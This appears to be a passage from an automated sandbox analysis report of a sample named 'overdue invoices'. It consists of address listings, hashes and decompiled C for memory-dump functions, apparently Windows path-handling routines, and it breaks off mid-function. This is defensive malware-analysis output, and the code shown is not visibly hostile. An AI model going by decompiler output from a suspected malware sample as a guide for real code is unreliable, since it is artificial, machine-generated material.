                  0x00a65d6f
                  0x00a65d73
                  0x00a65d79
                  0x00a65d7f
                  0x00a65d86
                  0x00a65d95
                  0x00a65d98
                  0x00a65dba
                  0x00a65dcb
                  0x00a65dce
                  0x00a65dd3
                  0x00a65dd6
                  0x00a65dd8
                  0x00a65de6
                  0x00a65dec
                  0x00a65dee
                  0x00a65df1
                  0x00a65df3
                  0x00a6635a
                  0x00a6635a
                  0x00000000
                  0x00a6635a
                  0x00a65dfe
                  0x00a65e02
                  0x00a65e05
                  0x00a65e07
                  0x00a65e10
                  0x00a65e13
                  0x00a65e1b
                  0x00a65e1c
                  0x00a65e21
                  0x00a65e22
                  0x00a65e23
                  0x00a65e25
                  0x00a65e2a
                  0x00a65e2c
                  0x00a65e2e
                  0x00a65e36
                  0x00a65e39
                  0x00a65e42
                  0x00a65e47
                  0x00a65e4d
                  0x00a65e54
                  0x00a65e54
                  0x00a65e54
                  0x00a65e2e
                  0x00a65e5c
                  0x00a65e5f
                  0x00a65e62
                  0x00a65e64
                  0x00a65e6b
                  0x00a65e70
                  0x00a65e7a
                  0x00a65e7a
                  0x00a65e7a
                  0x00a65e6b
                  0x00a65e7e
                  0x00a65e7f
                  0x00a65e7f
                  0x00a65e81
                  0x00a65e87
                  0x00a65e8b
                  0x00a65e8c
                  0x00a65e8c
                  0x00a65e8c
                  0x00a65e9a
                  0x00a65e9c
                  0x00a65ea2
                  0x00a65ea6
                  0x00a65f50
                  0x00a65f50
                  0x00a65f57
                  0x00a65f66
                  0x00a65f66
                  0x00a65f66
                  0x00a65f68
                  0x00a65f6a
                  0x00a663d0
                  0x00000000
                  0x00a65f70
                  0x00a65f70
                  0x00a65f91
                  0x00a65f9c
                  0x00a65f9e
                  0x00a65fa4
                  0x00a65fa6
                  0x00a6638c
                  0x00a66392
                  0x00a663a1
                  0x00a663a7
                  0x00a663af
                  0x00a663af
                  0x00a663bd
                  0x00a663d8
                  0x00000000
                  0x00a663d8
                  0x00a65fac
                  0x00a65fb2
                  0x00a65fb4
                  0x00a65fbd
                  0x00a65fc6
                  0x00a65fce
                  0x00a65fd4
                  0x00a65fdc
                  0x00a65fec
                  0x00a65fed
                  0x00a65fee
                  0x00a65fef
                  0x00a65ff9
                  0x00a65ffa
                  0x00a65ffb
                  0x00a65ffc
                  0x00a66000
                  0x00a66004
                  0x00a66012
                  0x00a66012
                  0x00a66018
                  0x00a66019
                  0x00a6601a
                  0x00a6601b
                  0x00a6601c
                  0x00a66020
                  0x00a66059
                  0x00a6605c
                  0x00a66061
                  0x00a66061
                  0x00a66022
                  0x00a66022
                  0x00a66022
                  0x00a66025
                  0x00a6602a
                  0x00a6602b
                  0x00a66031
                  0x00a66037
                  0x00a66038
                  0x00a6603e
                  0x00a66048
                  0x00a66049
                  0x00a6604a
                  0x00a6604b
                  0x00a6604c
                  0x00a6604d
                  0x00a66053
                  0x00a66054
                  0x00a66054
                  0x00a66062
                  0x00a66065
                  0x00a66067
                  0x00a6606a
                  0x00a66070
                  0x00a66075
                  0x00a66076
                  0x00a66081
                  0x00a66087
                  0x00a66095
                  0x00a66099
                  0x00a6609e
                  0x00a660a4
                  0x00a660ae
                  0x00a660b0
                  0x00a660b3
                  0x00a660b6
                  0x00a660b8
                  0x00a660ba
                  0x00a660ba
                  0x00a660ba
                  0x00a660ba
                  0x00a660be
                  0x00a660c0
                  0x00a660c5
                  0x00a660c5
                  0x00a660c5
                  0x00a660c6
                  0x00a660cd
                  0x00a66114
                  0x00a660cf
                  0x00a660cf
                  0x00a660d4
                  0x00a660d5
                  0x00a660da
                  0x00a660db
                  0x00a660e1
                  0x00a660e2
                  0x00a660e8
                  0x00a660f8
                  0x00a660fd
                  0x00a660fe
                  0x00a66102
                  0x00a66104
                  0x00a66107
                  0x00a66109
                  0x00a6610b
                  0x00a6610b
                  0x00a6610b
                  0x00a6610b
                  0x00a6610f
                  0x00a6610f
                  0x00a66117
                  0x00a6611a
                  0x00a6611f
                  0x00a66125
                  0x00a66134
                  0x00a66139
                  0x00a6613f
                  0x00a66146
                  0x00a66148
                  0x00a6614b
                  0x00a6614d
                  0x00a6614f
                  0x00a6614f
                  0x00a6614f
                  0x00a6614f
                  0x00a66153
                  0x00a66159
                  0x00a66159
                  0x00a6615c
                  0x00a66163
                  0x00a66169
                  0x00a6616c
                  0x00a66172
                  0x00a66181
                  0x00a66186
                  0x00a66187
                  0x00a6618b
                  0x00a66191
                  0x00a66195
                  0x00a661a3
                  0x00a661bb
                  0x00a661c0
                  0x00a661c3
                  0x00a661cc
                  0x00a661d0
                  0x00a661dc
                  0x00a661de
                  0x00a661e1
                  0x00a661e4
                  0x00a661e6
                  0x00a661e8
                  0x00a661e8
                  0x00a661e8
                  0x00a661e8
                  0x00a661e6
                  0x00a661ec
                  0x00a661f3
                  0x00a66203
                  0x00a66209
                  0x00a6620a
                  0x00a66216
                  0x00a6621d
                  0x00a66227
                  0x00a66241
                  0x00a66246
                  0x00a6624c
                  0x00a66257
                  0x00a66259
                  0x00a6625c
                  0x00a6625e
                  0x00a66260
                  0x00a66260
                  0x00a66260
                  0x00a66260
                  0x00a6625e
                  0x00a66264
                  0x00a66267
                  0x00a66269
                  0x00a66315
                  0x00a66315
                  0x00a6631b
                  0x00a6631e
                  0x00a66324
                  0x00a66327
                  0x00a6632f
                  0x00a66330
                  0x00a66333
                  0x00a6633a
                  0x00a6633c
                  0x00a66335
                  0x00a66335
                  0x00a66335
                  0x00a6633f
                  0x00a66342
                  0x00a6634c
                  0x00a66352
                  0x00a66355
                  0x00a66355
                  0x00a66359
                  0x00000000
                  0x00a6626f
                  0x00a66275
                  0x00a66275
                  0x00a66278
                  0x00a6627e
                  0x00a6627e
                  0x00a66281
                  0x00a66287
                  0x00a6628d
                  0x00a66298
                  0x00a6629c
                  0x00a662a2
                  0x00a6629e
                  0x00a6629e
                  0x00a6629e
                  0x00a662a7
                  0x00a662a7
                  0x00a662aa
                  0x00a662b0
                  0x00a662f0
                  0x00a662f0
                  0x00a662f2
                  0x00a662f8
                  0x00a662fd
                  0x00a662b2
                  0x00a662b2
                  0x00a662b2
                  0x00a662b5
                  0x00a662dd
                  0x00a662e2
                  0x00a662e5
                  0x00a662b7
                  0x00a662b8
                  0x00a662bb
                  0x00a662bd
                  0x00a662c0
                  0x00a662c4
                  0x00a662cd
                  0x00a662cd
                  0x00a662c0
                  0x00a662bb
                  0x00a662b5
                  0x00a66302
                  0x00a66303
                  0x00a66305
                  0x00a66305
                  0x00a66305
                  0x00a6630c
                  0x00a6630c
                  0x00000000
                  0x00a6627e
                  0x00a66269
                  0x00a65eac
                  0x00a65ebb
                  0x00a65ebe
                  0x00a65ecb
                  0x00a65ecb
                  0x00a65ece
                  0x00a65ece
                  0x00a65ed4
                  0x00a65ed7
                  0x00a65ed9
                  0x00a65edb
                  0x00a65edb
                  0x00a65ee1
                  0x00a65ee1
                  0x00a65ee3
                  0x00a65f20
                  0x00a65f20
                  0x00a65ee5
                  0x00a65ee5
                  0x00a65ee5
                  0x00a65ee8
                  0x00a65f11
                  0x00a65f18
                  0x00a65eea
                  0x00a65eea
                  0x00a65eed
                  0x00a65ef2
                  0x00a65ef8
                  0x00a65efb
                  0x00a65f0a
                  0x00a65f0a
                  0x00a65eed
                  0x00a65ee8
                  0x00a65f22
                  0x00a65f28
                  0x00000000
                  0x00000000
                  0x00a65f30
                  0x00a65f31
                  0x00a65f37
                  0x00a65f3a
                  0x00a65f3d
                  0x00a65f44
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00a65f46
                  0x00a65f48
                  0x00a65f4d
                  0x00000000
                  0x00a65f4d
                  0x00a65dda
                  0x00a65ddf
                  0x00000000
                  0x00a65ddf
                  0x00a65dd8
                  0x00a65da7
                  0x00a65da9
                  0x00a65dac
                  0x00a65dae
                  0x00000000
                  0x00a65db4
                  0x00a65db4
                  0x00000000
                  0x00a65db4
                  0x00a65dae
                  0x00a65d88
                  0x00a65d8d
                  0x00a66363
                  0x00a66369
                  0x00a6636a
                  0x00a66370
                  0x00a66372
                  0x00a6637a
                  0x00a6637b
                  0x00a6637d
                  0x00000000
                  0x00000000
                  0x00a6637f
                  0x00a66385
                  0x00000000
                  0x00a66385
                  0x00a65d38
                  0x00a65d3b
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00a65d3b
                  0x00a65d27
                  0x00a65d29
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00a66360
                  0x00000000
                  0x00a66360
                  0x00a65c10
                  0x00a65c10
                  0x00a663da
                  0x00a663e5
                  0x00a663e5

                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 0ae9f34a2a6a1c21ad73af7bbd57b7f576873c33a67f20a49eb1ab95868cfefa
                  • Instruction ID: 34094a6ee4db39828bad4ca80f4060e631a2a4869710ab347bed37118f7b529b
                  • Opcode Fuzzy Hash: 0ae9f34a2a6a1c21ad73af7bbd57b7f576873c33a67f20a49eb1ab95868cfefa
                  • Instruction Fuzzy Hash: 16424675E00629CFDB24CF68C881BA9B7B1FF49304F1581AAD94DAB342E7359A85CF50
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 009B4120 Relevance: .4, Instructions: 444COMMONCrypto
                  Download Yara Rule
                  C-Code - Quality: 92%
                  			E009B4120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0xa8d360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E009CF232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E009B6E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L009B4620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E009B6E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M009B45F8))) {
												case 0:
													_v568 = 0x971078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x9711c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L009B4620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															L009DF720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															L009DF720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E009952A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E009AEB70(1, 0xa879a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E009AAA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E009D95D0();
																			L009B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L009B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return L009DB640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E009D3D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return L009DB640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}















































































                  0x009b4128
                  0x009b4135
                  0x009b413c
                  0x009b4141
                  0x009b4145
                  0x009b4147
                  0x009b414e
                  0x009b4151
                  0x009b4159
                  0x009b415c
                  0x009b4160
                  0x009b4164
                  0x009b4168
                  0x009b416c
                  0x009b417f
                  0x009b4181
                  0x009b446a
                  0x009b446a
                  0x009b418c
                  0x009b4195
                  0x009b4199
                  0x009b4432
                  0x009b4439
                  0x009b443d
                  0x009b4442
                  0x009b4447
                  0x00000000
                  0x009b419f
                  0x009b41a3
                  0x009b41b1
                  0x009b41b9
                  0x009b41bd
                  0x009b45db
                  0x009b45db
                  0x00000000
                  0x009b41c3
                  0x009b41c3
                  0x009b41ce
                  0x009b41d4
                  0x009fe138
                  0x009fe13e
                  0x009fe169
                  0x009fe16d
                  0x009fe19e
                  0x009fe16f
                  0x009fe16f
                  0x009fe175
                  0x009fe179
                  0x009fe18f
                  0x009fe193
                  0x00000000
                  0x009fe199
                  0x00000000
                  0x009fe199
                  0x009fe193
                  0x00000000
                  0x00000000
                  0x00000000
                  0x009b41da
                  0x009b41da
                  0x009b41df
                  0x009b41e4
                  0x009b41ec
                  0x009b4203
                  0x009b4207
                  0x009fe1fd
                  0x009b4222
                  0x009b4226
                  0x009fe1f3
                  0x009fe1f3
                  0x009b422c
                  0x009b422c
                  0x009b4233
                  0x009fe1ed
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x009b4239
                  0x009b4239
                  0x009b4239
                  0x009b4239
                  0x009b4233
                  0x009b4226
                  0x009b41ee
                  0x009b41ee
                  0x009b41f4
                  0x009b4575
                  0x009fe1b1
                  0x009fe1b1
                  0x00000000
                  0x009b457b
                  0x009b457b
                  0x009b4582
                  0x009fe1ab
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x009b4588
                  0x009b4588
                  0x009b458c
                  0x009fe1c4
                  0x009fe1c4
                  0x00000000
                  0x009b4592
                  0x009b4592
                  0x009b4599
                  0x009fe1be
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x009b459f
                  0x009b459f
                  0x009b45a3
                  0x009fe1d7
                  0x009fe1e4
                  0x00000000
                  0x009b45a9
                  0x009b45a9
                  0x009b45b0
                  0x009fe1d1
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x009b45b6
                  0x009b45b6
                  0x009b45b6
                  0x00000000
                  0x009b45b6
                  0x009b45b0
                  0x009b45a3
                  0x009b4599
                  0x009b458c
                  0x009b4582
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x009b41f4
                  0x009b423e
                  0x009b4241
                  0x009b45c0
                  0x009b45c4
                  0x00000000
                  0x009b45ca
                  0x009b45ca
                  0x00000000
                  0x009fe207
                  0x009fe20f
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x009b45d1
                  0x00000000
                  0x00000000
                  0x009b45ca
                  0x00000000
                  0x009b4247
                  0x009b4247
                  0x009b4247
                  0x009b4249
                  0x009b4249
                  0x009b4249
                  0x009b4251
                  0x009b4251
                  0x009b4257
                  0x009b425f
                  0x009b426e
                  0x009b4270
                  0x009b427a
                  0x009fe219
                  0x009fe219
                  0x009b4280
                  0x009b4282
                  0x009b4456
                  0x009b45ea
                  0x00000000
                  0x009b45f0
                  0x009fe223
                  0x00000000
                  0x009fe223
                  0x009b445c
                  0x009b445c
                  0x00000000
                  0x009b445c
                  0x00000000
                  0x009b4288
                  0x009b428c
                  0x009fe298
                  0x009b4292
                  0x009b4292
                  0x009b429e
                  0x009b42a3
                  0x009b42a7
                  0x009b42ac
                  0x009fe22d
                  0x009b42b2
                  0x009b42b2
                  0x009b42b9
                  0x009b42bc
                  0x009b42c2
                  0x009b42ca
                  0x009b42cd
                  0x009b42cd
                  0x009b42d4
                  0x009b433f
                  0x009b433f
                  0x009b42d6
                  0x009b42d6
                  0x009b42d9
                  0x009b42dd
                  0x009b42eb
                  0x009fe23a
                  0x009b42f1
                  0x009b4305
                  0x009b430d
                  0x009b4315
                  0x009b4318
                  0x009b431f
                  0x009b4322
                  0x009b432e
                  0x009b433b
                  0x009b433b
                  0x00000000
                  0x009b432e
                  0x009b42eb
                  0x009b434c
                  0x009b434e
                  0x009b4352
                  0x009b4359
                  0x009b435e
                  0x009b4361
                  0x009b436e
                  0x009b438a
                  0x009b438e
                  0x009b4396
                  0x009b439e
                  0x009b43a1
                  0x009b43ad
                  0x009b43bb
                  0x009b43bb
                  0x009b43ad
                  0x009b436e
                  0x009b43bf
                  0x009b43c5
                  0x009b4463
                  0x009b4463
                  0x009b43ce
                  0x009b43d5
                  0x009b43d9
                  0x009b43df
                  0x009b4475
                  0x009b4479
                  0x009b4491
                  0x009b4491
                  0x009b4479
                  0x009b43e5
                  0x009b43eb
                  0x009b43f4
                  0x009b43f6
                  0x009b43f9
                  0x009b43fc
                  0x009b43ff
                  0x009b44e8
                  0x009b44ed
                  0x009b44f3
                  0x009fe247
                  0x00000000
                  0x009b44f9
                  0x009b4504
                  0x009b4508
                  0x009b450f
                  0x009fe269
                  0x00000000
                  0x009b4515
                  0x009b4519
                  0x009b4531
                  0x009b4534
                  0x009b4537
                  0x009b453e
                  0x009b4541
                  0x009b454a
                  0x009fe255
                  0x009fe255
                  0x009fe25b
                  0x009fe25e
                  0x009fe261
                  0x009fe261
                  0x009b4555
                  0x009b4559
                  0x009b455d
                  0x009fe26d
                  0x009fe270
                  0x009fe274
                  0x009fe27a
                  0x009fe27d
                  0x009fe28e
                  0x009fe28e
                  0x009b4563
                  0x009b4563
                  0x009b4569
                  0x009b4569
                  0x00000000
                  0x009b455d
                  0x009b450f
                  0x00000000
                  0x009b44f3
                  0x009b43ff
                  0x009b4405
                  0x009b4405
                  0x009b4405
                  0x009b42ac
                  0x009b428c
                  0x009b4282
                  0x009b4407
                  0x009b440d
                  0x009fe2af
                  0x009fe2af
                  0x009b4413
                  0x009b4413
                  0x00000000
                  0x009b41d4
                  0x00000000
                  0x009b41c3
                  0x009b41bd
                  0x009b4415
                  0x009b4415
                  0x009b4416
                  0x009b4417
                  0x009b4429
                  0x009b416e
                  0x009b416e
                  0x009b4175
                  0x009b4498
                  0x009b449f
                  0x009fe12d
                  0x00000000
                  0x009fe133
                  0x00000000
                  0x009fe133
                  0x009b44a5
                  0x009b44a5
                  0x009b44aa
                  0x00000000
                  0x009b44bb
                  0x009b44ca
                  0x009b44d6
                  0x009b44d7
                  0x009b44d8
                  0x009b44e3
                  0x009b44e3
                  0x009b44aa
                  0x009b417b
                  0x009b417b
                  0x009b417b
                  0x00000000
                  0x009b417b
                  0x009b4175
                  0x00000000

                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a890887146814c9bf930ff45e992028b01f17b19b9808ef86cf17ae9c594accd
                  • Instruction ID: 0da3d4e36ec1eba7587c096968c3b2afbe781b1e59fcb705c214c10a8007862e
                  • Opcode Fuzzy Hash: a890887146814c9bf930ff45e992028b01f17b19b9808ef86cf17ae9c594accd
                  • Instruction Fuzzy Hash: 5BF18F706082118FC724CF59C580ABAB7E6FF98724F14492EF596CB262E734D891EB52
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 009C20A0 Relevance: .4, Instructions: 420COMMONCrypto
                  Download Yara Rule
                  C-Code - Quality: 92%
                  			E009C20A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
				signed int _v16;
				signed int _v20;
				signed char _v24;
				intOrPtr _v28;
				signed int _v32;
				void* _v36;
				char _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				char _v64;
				unsigned int _v68;
				signed int _v72;
				char _v73;
				signed int _v74;
				char _v75;
				signed int _v76;
				void* _v81;
				void* _v82;
				void* _v89;
				void* _v92;
				void* _v97;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t128;
				void* _t129;
				signed int _t130;
				void* _t132;
				signed char _t133;
				intOrPtr _t135;
				signed int _t137;
				signed int _t140;
				signed int* _t144;
				signed int* _t145;
				intOrPtr _t146;
				signed int _t147;
				signed char* _t148;
				signed int _t149;
				signed int _t153;
				signed int _t169;
				signed int _t174;
				signed int _t180;
				void* _t197;
				void* _t198;
				signed int _t201;
				intOrPtr* _t202;
				intOrPtr* _t205;
				signed int _t210;
				signed int _t215;
				signed int _t218;
				signed char _t221;
				signed int _t226;
				char _t227;
				signed int _t228;
				void* _t229;
				unsigned int _t231;
				void* _t235;
				signed int _t240;
				signed int _t241;
				void* _t242;
				signed int _t246;
				signed int _t248;
				signed int _t252;
				signed int _t253;
				void* _t254;
				intOrPtr* _t256;
				intOrPtr _t257;
				unsigned int _t262;
				signed int _t265;
				void* _t267;
				signed int _t275;

				_t198 = __ebx;
				_t267 = (_t265 & 0xfffffff0) - 0x48;
				_v68 = __ecx;
				_v73 = 0;
				_t201 = __edx & 0x00002000;
				_t128 = __edx & 0xffffdfff;
				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
				_v72 = _t128;
				if((_t128 & 0x00000008) != 0) {
					__eflags = _t128 - 8;
